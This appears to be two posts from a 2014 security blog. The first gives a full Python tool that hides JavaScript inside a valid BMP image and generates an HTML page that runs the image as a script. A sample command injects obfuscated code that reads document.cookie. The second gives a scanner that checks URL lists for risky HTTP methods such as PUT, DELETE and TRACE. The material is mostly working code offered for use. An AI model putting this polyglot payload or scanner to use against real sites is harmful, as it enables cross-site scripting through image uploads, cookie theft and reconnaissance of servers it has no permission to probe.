Monday, 31 March 2014

BMP INJECTION Python.

It helps to inject source to BMP.
If you need to test uploading BMP with javascript, you could use bmpinjection.py.

 #!/usr/bin/env python2  
 #============================================================================================================#  
 #======= Simply injects a JavaScript Payload into a BMP. ====================================================#  
 #======= The resulting BMP must be a valid (not corrupted) BMP. =============================================#  
 #======= Author: marcoramilli.blogspot.com ==================================================================#  
 #======= Version: PoC (don't even think to use it in development env.) ======================================#  
 #======= Disclaimer: ========================================================================================#  
 #THIS SOFTWARE IS PROVIDED BY THE AUTHOR "AS IS" AND ANY EXPRESS OR  
 #IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED  
 #WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE  
 #DISCLAIMED. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT,  
 #INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES  
 #(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR  
                                 #SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)  
                                 #HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,  
 #STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING  
 #IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE  
 #POSSIBILITY OF SUCH DAMAGE.  
 #===========================================================================================================#  
 import argparse  
 import os  
   
 #---------------------------------------------------------  
 def _hexify(num):  
     """  
     Converts and formats to hexadecimal  
     """  
     num = "%x" % num  
     if len(num) % 2:  
         num = '0'+num  
     return num.decode('hex')  
   
 #---------------------------------------------------------  
 #Example payload: "var _0xe428=[\""+ b'\x48\x65\x6C\x6C\x6F\x20\x57\x6F\x72\x6C\x64' + "\"]  
 #;alert(_0xe428[0]);"  
 def _generate_and_write_to_file(payload, fname):  
     """  
     Generates a fake but valid BMP within scriting  
     """  
     f = open(fname, "wb")  
     header = (b'\x42\x4D' #Signature BM  
          b'\x2F\x2A\x00\x00' #Header File size, but encoded as /* <-- Yes it's a valid header  
          b'\x00\x00\x00\x00' #Reserved  
          b'\x00\x00\x00\x00' #bitmap data offset  
          b''+ _hexify( len(payload) ) + #bitmap header size  
          b'\x00\x00\x00\x14' #width 20pixel .. it's up to you  
          b'\x00\x00\x00\x14' #height 20pixel .. it's up to you  
          b'\x00\x00' #nb_plan  
          b'\x00\x00' #nb per pixel  
          b'\x00\x10\x00\x00' #compression type  
          b'\x00\x00\x00\x00' #image size .. its ignored  
          b'\x00\x00\x00\x01' #Horizontal resolution  
          b'\x00\x00\x00\x01' #Vertial resolution  
          b'\x00\x00\x00\x00' #number of colors  
          b'\x00\x00\x00\x00' #number important colors  
          b'\x00\x00\x00\x80' #palet colors to be complient  
          b'\x00\x80\xff\x80' #palet colors to be complient  
          b'\x80\x00\xff\x2A' #palet colors to be complient  
          b'\x2F\x3D\x31\x3B' #*/=1;  
          )  
     # I made this explicit, step by step .  
     f.write(header)  
     f.write(payload)  
     f.close()  
     return True  
   
 #---------------------------------------------------------  
 def _generate_launching_page(f):  
     """  
     Creates the HTML launching page  
     """  
   
     htmlpage ="""<html>  
 <head><title>Opening an image</title> </head>  
 <body>  
 <img src=\"""" + f + """\"\>  
 <script src= \"""" + f + """\"> </script>  
 </body>  
 </html>  
 """  
     html = open("run.html", "wb")  
     html.write(htmlpage);  
     html.close()  
     return True  
   
 #---------------------------------------------------------  
 def _inject_into_file(payload, fname):  
     """  
     Injects the payload into existing BMP  
     NOTE: if the BMP contains \xFF\x2A might caouse issues  
     """  
     # I know, I can do it all in memory and much more fast.  
     # I wont do it here.  
     f = open(fname, "r+b")  
     b = f.read()  
     b.replace(b'\x2A\x2F',b'\x00\x00')  
     f.close()  
   
     f = open(fname, "w+b")  
     f.write(b)  
     f.seek(2,0)  
     f.write(b'\x2F\x2A')  
     f.close()  
   
     f = open(fname, "a+b")  
     f.write(b'\xFF\x2A\x2F\x3D\x31\x3B')  
     f.write(payload)  
     f.close()  
     return True  
   
   
 #---------------------------------------------------------  
 if __name__ == "__main__":  
     parser = argparse.ArgumentParser()  
     parser.add_argument("filename",help="the bmp file name to be generated/or infected")  
     parser.add_argument("js_payload",help="the payload to be injected. For exmample: \"alert(\"test\");\"")  
     parser.add_argument("-i", "--inject-to-existing-bmp", action="store_true", help="inject into the current bitmap")  
     args = parser.parse_args()  
     print("""  
 |======================================================================================================|  
 | [!] legal disclaimer: usage of this tool for injecting malware to be propagated is illegal.     |  
 | It is the end user's responsibility to obey all applicable local, state and federal laws.      |  
 | Authors assume no liability and are not responsible for any misuse or damage caused by this program |  
 |======================================================================================================|  
 """)  
     if args.inject_to_existing_bmp:  
          _inject_into_file(args.js_payload, args.filename)  
     else:  
         _generate_and_write_to_file(args.js_payload, args.filename)  
       
     _generate_launching_page(args.filename)  
     print "[+] Finished!"  
   

 c:\Python27\python.exe bmpinject.py -i 1.bmp "var _0x9c4c=\"\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x63\x6f\x6f\x6b\x69\x65\"; function Msgbox(_0xccb4x3){alert(eval(_0xccb4x3));};Msgbox(_0x9c4c);"  

Thursday, 20 March 2014

Web METHOD CHECK

Sometimes, I need to check many URLs' methods such as "TRACE", "DELETE", "PUT", "COPY".

So, I just make simple python code. :)

Readme:
url.txt : you should have url lists in same directory.

 import socket, sys, re  
 import string  
   
 def main():  
   # Fillter SSL PORT  
   ssl_port = 443  
     
   # Common Port Mode  
   port = ["80"]  
   
   # INTERNAL URL  
   urldata = open("url.txt", "r")    
   
   count = 0  
   
   for i in urldata:  
     count += 1  
     i = i.strip('\n')  
     for j in port:  
       isheader(i, int(j), count, ssl_port)  
   
   urldata.close()  
   print("\r\nFINISH. Thank you")  
     
   
 def savingR(port, num, url, msg):  
   fp_r = open("result_"+str(port)+".txt","a")  
   fp_r.write("["+str(num)+"]"+url+":"+str(port)+"-"+msg+"\r\n")  
   fp_r.flush()  
   fp_r.close()  
   
 def Msgprint(url, port, msg):  
   print("%s(%d): Done [%s]" %(url, port, msg))  
   
 def isheader(url, port, num, ssl_port):  
   
   s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  
   s.settimeout(10)  
   try:  
     if (ssl_port == port):  
       try:  
         s.connect((url, port))  
       except socket.error:  
         msg = "Closed port(ssl)"  
         Msgprint(url, port, msg)  
         s.close()  
         return 0  
         
       s_ssl = socket.ssl(s)  
   
       s_ssl.write('OPTIONS / HTTP/1.0\r\n\r\n')  
       buf = s_ssl.read()  
       s.close()  
   
     else:  
       try:  
         s.connect((url, port))  
       except socket.error:  
         msg = "Closed port"  
         Msgprint(url, port, msg)  
         s.close()  
         return 0  
         
       s.send("OPTIONS / HTTP/1.0\r\n\r\n".encode('utf-8'))  
   
       buf = (s.recv(1024)).decode('utf-8')  
       s.close()  
       
     if not buf:  
       msg = "Not Return from this server"  
       Msgprint(url, port, msg)  
       return 0  
   
     msg = ''.join(re.findall('Allow:.*', buf))  
   
     if (msg == ""):  
       msg = "Nothing"  
         
     if(''.join(re.findall('PUT', msg))) or (''.join(re.findall('COPY', msg))) or (''.join(re.findall('DELETE', msg)) or (''.join(re.findall('TRACE', msg)))):  
       # To save results  
       num = num+1  
       savingR(port, num, url, msg)  
       msg += "] [*FOUND"  
         
     Msgprint(url, port, msg)  
   
   except:  
     msg = "Timeout"  
     Msgprint(url, port, msg)  
     s.close()  
     return 0  
 main()